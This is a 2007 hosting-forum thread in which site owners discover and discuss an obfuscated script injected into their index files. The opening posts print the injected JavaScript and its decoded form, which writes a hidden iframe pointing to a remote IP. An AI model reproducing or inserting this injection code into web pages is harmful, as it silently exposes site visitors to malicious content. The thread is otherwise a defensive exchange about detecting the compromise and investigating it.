bluejohn
Newbie
 Offline
Posts: 5
|
 |
« on: August 28, 2007, 11:17:12 PM » |
|
All,
This morning I discovered that someone has appended the following script to every index.* on my server.
<script>function v46d4d0436053e(v46d4d04360d0d){ function v46d4d043614d2 () {var v46d4d04361ca4=16; return v46d4d04361ca4;} return(parseInt(v46d4d04360d0d,v46d4d043614d2()));}function v46d4d04362471(v46d4d04362c42){ var v46d4d043643c0=2; var v46d4d0436341a='';for(v46d4d04363beb=0; v46d4d04363beb<v46d4d04362c42.length; v46d4d04363beb+=v46d4d043643c0){ v46d4d0436341a+=(String.fromCharCode(v46d4d0436053e(v46d4d04362c42.substr(v46d4d04363beb, v46d4d043643c0))));}return v46d4d0436341a;} document.write(v46d4d04362471('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3862646232207372633D5C27687474703A2F2F35382E36352E3233352E3135332F7E706F7A69746976652F6963652F696E6465782E7068703F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313032303834292B27633237316133645C272077696474683D313838206865696768743D353433207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
My server is hacked, I presume. Anyone discovered this as well?
Regards,
Johan
|
|
|
|
|
Logged
|
|
|
|
bluejohn
Newbie
Offline
Posts: 5
|
|
« Reply #1 on: August 28, 2007, 11:35:38 PM » |
|
If I escape the script (generated by this script) I get something like %3CSCRIPT%3Ewindow.status%3D%27Done%27%3Bdocument.write%28%27%3Ciframe%20name%3D06%20src%3D%5C%27http%3A//58.65.235.153/%7Epozitive/ice/index.php%3F%27+Math.round%28Math.random%28%29*47430%29+%27558106f9d5%5C%27%20width%3D155%20height%3D306%20style%3D%5C%27display%3A%20none%5C%27%3E%3C/iframe%3E%27%29%3C/SCRIPT%3E See http://groups.google.com/group/news.admin.net-abuse.email/browse_thread/thread/78ef83964dd2ec14/5de97e64e0aaf61b for someone reporting the same problem. Anywone any idea on where my security hole is? Johan |
|
|
|
|
Logged
|
|
|
|
|
leighsww
|
|
« Reply #2 on: August 28, 2007, 11:40:45 PM » |
|
I just checked the 3 accounts I take care of, and YES, so far I found that on ONE of the account's index.html page. (I just renamed the index.html page so that it can't be executed).
It's on my father's server and weird because I put a blank index.html page for his site because he only uses his server for private use for his company and clients (there's no website). I found that same code just like the one you posted.
He's on Chara server. What server are you on?
|
|
|
|
|
Logged
|
|
|
|
|
leighsww
|
|
« Reply #3 on: August 28, 2007, 11:46:18 PM » |
|
Okay, I checked other files on his server and it seems that the SMF forums that I installed for him has been also hacked with that code.
I had upgraded to the latest version of SMF 1.1.3 when it first came out, so there must be a vulnerability with SMF.
Do you have SMF installed on your site?
Anybody else using SMF, please check your index.php file and see if you also have that hack script.
|
|
|
|
|
Logged
|
|
|
|
bluejohn
Newbie
Offline
Posts: 5
|
|
« Reply #4 on: August 28, 2007, 11:47:31 PM » |
|
I'm on aphelion.
Is this a major hack of lunarpages???
Johan
|
|
|
|
|
Logged
|
|
|
|
|
leighsww
|
|
« Reply #5 on: August 28, 2007, 11:50:17 PM » |
|
I don't know. If you hadn't posted this, I wouldn't have known about it, so THANK YOU so much!!
I'm sure others will post as soon as they check their sites' files, as I'm sure we can't be the only ones.
I'm going to look at logs as soon as I'm finished checking all his files on the server to make sure nothing else was touched.
I renamed all the hacked files (I suggest you do the same).
|
|
|
|
« Last Edit: August 28, 2007, 11:51:55 PM by leighsww »
|
Logged
|
|
|
|
bluejohn
Newbie
Offline
Posts: 5
|
|
« Reply #6 on: August 28, 2007, 11:52:54 PM » |
|
I don't know what the impact is. It could be that they've logged a lot of things, including some username/password combinations (e.g. when logging into a webbased email client).
I'm not using SMF, so it must be something else or not only SMF that has this vulnerability.
Regards,
Johan
|
|
|
|
|
Logged
|
|
|
|
|
leighsww
|
|
« Reply #7 on: August 29, 2007, 12:03:33 AM » |
|
Looks like this hack was just done today (at least for my dad's site), because the files that were touched had today's date on them. I hadn't touched my dad's server since early August, so I was able to spot the hacked files right away by the date. Looks like only 2 files were hacked with that code on our server - "index.html" (a blank file in the root public_html) and "index.php" (for the SMF forum). No other file has a date change on it. Gosh, if you hadn't spotted the hack today, who knows how long this might have stayed there unknowingly and what it would have done if executed. I really appreciate you posting this!!  |
|
|
|
|
Logged
|
|
|
|
|
leighsww
|
|
« Reply #8 on: August 29, 2007, 12:08:33 AM » |
|
I'm not using SMF, so it must be something else or not only SMF that has this vulnerability. Ah. Are you using php though? I have to say though, this is kinda disturbing that SMF 1.1.3 has a vulnerability like this, because that's going to be what a lot of people are using here at LP. I don't have any mods installed for his forum, so looks like the original bare-bones script has a security hole in it. Well, I'm going to go look at the logs now to see if I can spot the IP address of the Hacker and any other info I can find. Unfortunately, at this time of night, others won't see this thread until the morning due to their timezone  |
|
|
|
|
Logged
|
|
|
|
|
leighsww
|
|
« Reply #9 on: August 29, 2007, 12:13:19 AM » |
|
DANG, the last date the logs show on the server as being updated is 8/8/2007. Why isn't cPanel's logs updating!!!  This makes it impossible now to find any data on what IP address hacked those files!  |
|
|
|
|
Logged
|
|
|
|
bluejohn
Newbie
Offline
Posts: 5
|
|
« Reply #10 on: August 29, 2007, 12:17:14 AM » |
|
I already tried to look at my logs, but they were all deleted.
And the files were changed today, so it looks as if it's the same hack attempt.
Can you open a support ticket? I don't have access from where I'm using the internet.
|
|
|
|
|
Logged
|
|
|
|
|
leighsww
|
|
« Reply #11 on: August 29, 2007, 12:25:59 AM » |
|
Yes, I'll put in a ticket and point them to this thread.
|
|
|
|
|
Logged
|
|
|
|
|
leighsww
|
|
« Reply #12 on: August 29, 2007, 12:39:13 AM » |
|
Okay, this is frustrating, but I can't submit a support ticket!! It won't accept my password, so I went through the "reset your password" route and it still won't let me in. I can't put in a support ticket!! Has anyone else had this problem with putting in a support ticket? --> https://support.lunarpages.com/account/login |
|
|
|
|
Logged
|
|
|
|
|
SteveW
|
|
« Reply #13 on: August 29, 2007, 12:40:00 AM » |
|
Leigh, if your log hasn't been erased by the hacker, you can get it at cpanel > Raw Access Logs instead of cpanel > Raw Log Manager. The fact that SMF's index.php was one of the hacked files doesn't mean that SMF has a hole. Any hack could have modified any file. I checked my home page and SMF index.php, both ok so far, but haven't checked others yet. I had a RFI hack attempt on the 26th from 83.18.159.125, in case that's any help. Is this a major hack of lunarpages??? It's probably automated and widespread. There's always crawlers running around trying to break into sites, but it's individual websites that would be vulnerable, not "Lunarpages". That would be extremely rare.
|
|
|
|
« Last Edit: August 29, 2007, 12:43:50 AM by SteveW »
|
Logged
|
|
|
|
|
leighsww
|
|
« Reply #14 on: August 29, 2007, 12:42:37 AM » |
|
Leigh, if your log hasn't been erased by the hacker, you can get it at cpanel > Raw Access Logs instead of cpanel > Raw Log Manager.
I access my logs via FTP. I go straight to the "logs" folder outside the public_html. The files haven't been updated since 8/8/2007. This has happened before on my other server and I had to have somebody reset the server to get the logs to update. |
|
|
|
|
Logged
|
|
|
|
|
Dilber MC Theme by HarzeM